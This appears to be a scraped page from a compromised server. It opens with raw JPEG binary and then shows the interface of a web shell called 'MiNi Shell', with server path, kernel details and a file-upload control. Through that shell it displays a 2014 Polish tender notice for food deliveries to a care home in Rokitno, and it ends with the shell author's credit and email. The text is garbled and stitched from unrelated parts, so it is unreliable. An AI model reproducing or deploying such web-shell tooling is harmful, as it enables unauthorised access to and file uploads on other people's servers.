JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141120/381798-N-2014.html

<p class="kh_header"><b>Rokitno: Przetarg nieograniczony na dostawę artykułów spożywczych do Domu Pomocy Społecznej w Rokitnie nr 38</b><br>
<b>Numer ogłoszenia: 381798 - 2014; data zamieszczenia: 20.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Rokitno 38, 66-340 Rokitno, woj. lubuskie, tel. 0-95 7493059, faks 0-95 7493059.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.wrota.lubuskie.pl/dps_rokitno_38/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę artykułów spożywczych do Domu Pomocy Społecznej w Rokitnie nr 38.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ A - suche
Budyń z cukrem  60g	szt	 1200
Chrupki kukurydziane 80g	szt	1200
Chrzan    160g 	szt	200
Cukier  1 kg	kg	1600  
Cukier waniliowy  32g  	szt	180
Cukier puder 0,5 kg	szt.	20
Cynamon 20g                 	szt	35 
Dżem    270g    o zawartości owoców nie mniej niż 46% , tj. 46 g owoców na 100 g produktu	szt 	650
Fasola czerwona konserwowa 380g	szt 	120
Fasola konserwowa szparagowa 520ml	szt	100
Fasola sucha (duża) 400g	szt	 170
Fasola sucha drobna 400g	szt	40
Groch łuskany    400 g     	szt	150
Groszek konserwowy 380g	szt	 50
Przyprawa GYROS 30g	szt	100
Herbata owocowa w saszetkach (20 torebek w opakowaniu)	opak.	300
Herbata ziołowa w saszetkach
 (20 torebek w opakowaniu)	opak.	300
Herbata zwykła w saszetkach (100szt w opak.)	opak.	300
Jarzynka w proszku 200g	szt	340
Kakao  ciemne 200g	szt	170
Kasza jęczmienna 1kg	kg 	210
Kaszka kukurydziana 400g	szt   	150
Kaszka manna   1kg	kg 	150
Kawa zbożowa   500 g	szt	120
Ketczup 480g 
(zawartość pomidorów nie mniej niż 106 g w 100 g ketchupu) 	

szt	450
Kisiel  z cukrem 77g	szt	1100
Koncentrat pomidorowy o zaw. pomidorów nie mniej niż 30%  900ml	
szt	300
Konserwa rybna   180g	szt	50
Kostka rosołowa  (6 sztuk w opakowaniu)	opak. 	200
Krem czekoladopodobny 
o zawartości kakao nie mniej niż (7,4%) 180g	szt	120
Kukurydza konserwowa   380g	szt	320 
Kwasek cytrynowy   20g   	szt	800
Liść laurowy    6g	szt	60
Lody ciepłe             	szt	900
Przyprawa do zup w płynie 750ml	szt 	170
Majeranek       15g	szt	250
Majonez o zawartości o zawartości żółtek nie mniej niż 6%  poj. 700g	

szt   	

200
Makaron świderki opakowanie jednostkowe nie większe niż 1 kg	kg 	300
Makaron muszelki     opakowanie jednostkowe nie większe niż 1 kg 	kg 	200
Makaron nitka rosołowa opakowanie jednostkowe nie większe niż 1 kg	kg    	 80
Mąka pszenna 1kg	kg 	900
Mąka ziemniaczana  1kg	kg	50
Miód prawdziwy         380g	szt	150
Musztarda 190g	szt	300
Ogórki konserwowe    900g	szt	400
Olej rzepakowy 1litr	1 litr	500   
Otręby pszenne 1 kg	kg 	20
Papryka konserwowa 820 g	szt	300
Papryka sucha 20g	szt	150
Paprykarz 300g	szt	450
Pasztet drobiowy 195g	szt	300
Pieprz  mielony         20g	szt	700
Płatki kukurydziane 1 kg	kg 	250
Płatki owsiane      1kg	kg 	100
Proszek do pieczenia 36g	szt	70 
Rodzynki          100g	szt	120
Ryż opakowanie jednostkowe nie większe niż 1 kg	kg 	500
Kasza gryczana 0,5 kg	kg	170
Sałatka szwedzka 900g	szt	250
Sok owocowy 2litry 
- z soków zagęszczonych  w ilości nie mniejszej niż 20%	szt	200
Sól  jodowana 1kg	1kg 	360
Syrop owocowy 500ml (ekstrakt ogólny nie mniej niż 65%)	
szt	400
Wafle nadziewane (konserwowane -termin przydatności do spożycia powyżej 45 dni)	

kg	100
Wafle dla diabetyków	kg 	 10
Ciastka kruche (konserwowane -termin przydatności do spożycia powyżej 45 dni)	
kg 	100
Zupy grzybowe      45g	szt	650
Żurek w proszku 49g	szt 	600
Szczaw          380g 	szt	 60
Ocet 0,5l	szt	20
CZĘŚĆ B - pieczywo
Chleb baltonowski (krojony)	1kg	5 200
Chleb razowy graham (krojony)	1kg	4 500
Bułka pszenna mała 	50g	35 000
Bułka maślana    	50g	1500       
Bułka tarta               	1 kg 	 90   
Drożdżówka                 	 100 g	1 500
Pączki z marmoladą i lukrem	 50g	1 500
CZĘŚĆ C -wędliny i mięso wieprzowe
blok szynkowy	kg	100                                                                          
boczek wędzony parzony	kg	240                       
boczek faszerowany	kg	100
flaki gotowane wieprzowe	kg	60
Karkówka bez kości	kg	200  
Kaszanka (gruba)	kg	200
kiełbasa zwyczajna  	kg	650
kiełbasa słoikowa	kg	130
kiełbasa piwna	kg	60
serdelki 	kg	250
kiełbasa śląska	kg	 200  
kiełbasa metka łososiowa	kg	100
kiełbasa mortadela	kg	130
kiełbasa parówkowa	kg	170
kiełbasa zielonogórska 	kg	130
Kiełbasa kanapkowa	kg	130
kiełbasa żywiecka	kg	130
Kości ze schabu	kg	400
łopatka z przyprawami	kg	50
mięso gulaszowi wieprzowe	kg	450
mięso mielone z łopatki	kg	550
Schab bez kości	kg	120
słonina	kg	10
smalec	kg	30
szynka gotowana	kg	20
szynka mielona	kg	35
wątroba wieprzowa	kg	150
wątrobianka	kg	100
żeberka	kg	250
pieczeń rzymska	kg	120
salceson czarny	kg	 80
salceson biały	kg	80
kiełbasa biała 	kg	30
CZĘŚĆ SD- mięso drobiowe
filet drobiowy	kg	300
wątróbka drobiowa	kg	120
porcje rosołowe	kg	200
kurczak	kg	300
udka z kurczaka	kg	480
drobiowe gulaszowe	kg	150
CZĘŚĆ E- ryby
Filet z mintaja (tafla)	kg	180
Filety z PANGI                     	kg 	180
Makrela wędzona 	kg	150
Śledź matyjas    	kg	160
CZĘŚĆ F - mrożonki
Pierogi z mięsem 	kg	120
Lody zimne 150g	szt	1600 
Marchewka mrożona 	kg	100
Mieszanka warzywna	kg	400
Pierogi ruskie      	kg	400
Włoszczyzna paski 	kg	200
CZĘŚĆ G - nabiał
Drożdże 	kg	10 
Jogurt naturalny	150g/sz	140 
Jogurt owocowy 	150 g/szt	3 500
Margaryna  zwykła  250g	kg	250
Tłuszcz mleczny do smarowania pieczywa zawartość tłuszczu mlecznego nie mniej niż 60% , tj. w 100g produktu zawartość tłuszczu mlecznego nie mniej niż 60g, w tym kwasy tłuszczowe nasycone minimum  40g 	kg

	200


Masło extra nie mniej niż 82 % tłuszczu mlecznego	kg	400
Tłuszcz roślinny do smarowania pieczywa o zawartości tłuszczu roślinnego nie mniej niż 80% w tym olej słonecznikowy nie mniej niż 35%	kg	500
Mleko 2 %  karton	  1 l	 7000
Maślaka  	 1 l	400
Mleko w proszku odtłuszczone o zawartości tłuszczu nie mniej niż 1% tj. w 100g mleka zawartość  tłuszczu nie mniej niż 1g w tym kwasy tłuszczowe nasycone niemniej niż 0,7g .
Opakowanie jednostkowe nie większe niż 1 kg 	kg	500
Ser biały półtłusty	1kg	600  
Serek topiony	1kg	250
Śmietana 12 % w opakowaniach 370g	    szt.	       800
Ser żółty	kg	300
Śmietana 30% w opakowaniach 250g	szt.	
60
Serek homogenizowany waniliowy 125g	szt.	300.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.wrota.lubuskie.pl/dps_rokitno_38/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Rokitno 38
Administracja 
66-340 Przytoczna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2014 godzina 09:30, miejsce: Dom Pomocy Społecznej Rokitno 38
Administracja 
66-340 Przytoczna
OFERTY MOŻNA SKŁADAĆ OSOBIŚCIE LUB LISTOWNIE.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com